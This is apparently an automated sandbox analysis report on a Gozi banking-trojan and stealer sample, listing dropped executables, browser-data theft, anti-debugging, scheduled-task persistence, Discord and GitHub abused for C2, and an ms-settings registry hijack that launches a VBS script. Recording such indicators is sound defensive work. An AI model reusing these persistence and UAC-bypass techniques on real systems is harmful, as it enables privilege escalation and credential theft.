Malware Analysis Report

2025-01-22 18:50

Sample ID 240311-wmp26aaa7t
Target gen_build.zip
SHA256 550f5faa4bdd6e5e435a19b6d77af1eace8750c5a9372d71f390454a949215f0
Tags
gozi banker isfb spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

550f5faa4bdd6e5e435a19b6d77af1eace8750c5a9372d71f390454a949215f0

Threat Level: Known bad

The file gen_build.zip was found to be: Known bad.

Malicious Activity Summary

gozi banker isfb spyware stealer trojan

Gozi

Reads user/profile data of web browsers

Loads dropped DLL

Executes dropped EXE

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Creates scheduled task(s)

Uses Task Scheduler COM API

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: AddClipboardFormatListener

Suspicious use of SetWindowsHookEx

Modifies data under HKEY_USERS

Modifies registry class

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of UnmapMainImage

Suspicious use of WriteProcessMemory

Enumerates system info in registry

NTFS ADS

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-11 18:02

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-11 18:02

Reported

2024-03-11 18:33

Platform

win11-20240221-en

Max time kernel

1800s

Max time network

1809s

Command Line

C:\Windows\Explorer.EXE

Signatures

Gozi

banker trojan gozi

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ek3b4ofg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.amazonaws.com N/A N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\MNR2drImVArLnmrvI050MX.exe N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\Explorer.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\Explorer.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\Explorer.EXE N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133546538350743638" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell\open C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell\open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\chinahalf1930182.vbs" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings C:\Windows\SysWOW64\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell\open\command\DelegateExecute = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{088e3905-0323-4b02-9826-5d99428e115f}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3084248216-1643706459-906455512-1000\{F3BA821A-C5BB-416B-BBC5-844D38F2A77A} C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ C:\Windows\Explorer.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\ms-settings\shell\open\command C:\Windows\SysWOW64\reg.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots C:\Windows\Explorer.EXE N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff C:\Windows\Explorer.EXE N/A
Key created \Registry\User\S-1-5-21-3084248216-1643706459-906455512-1000_Classes\NotificationData C:\Windows\Explorer.EXE N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\gen_build.zip:Zone.Identifier C:\Program Files\Google\Chrome\Application\chrome.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Temp\Temp1_gen_build.zip\gen.exe:Zone.Identifier C:\Windows\Explorer.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ek3b4ofg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ek3b4ofg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\gen.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\ek3b4ofg.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
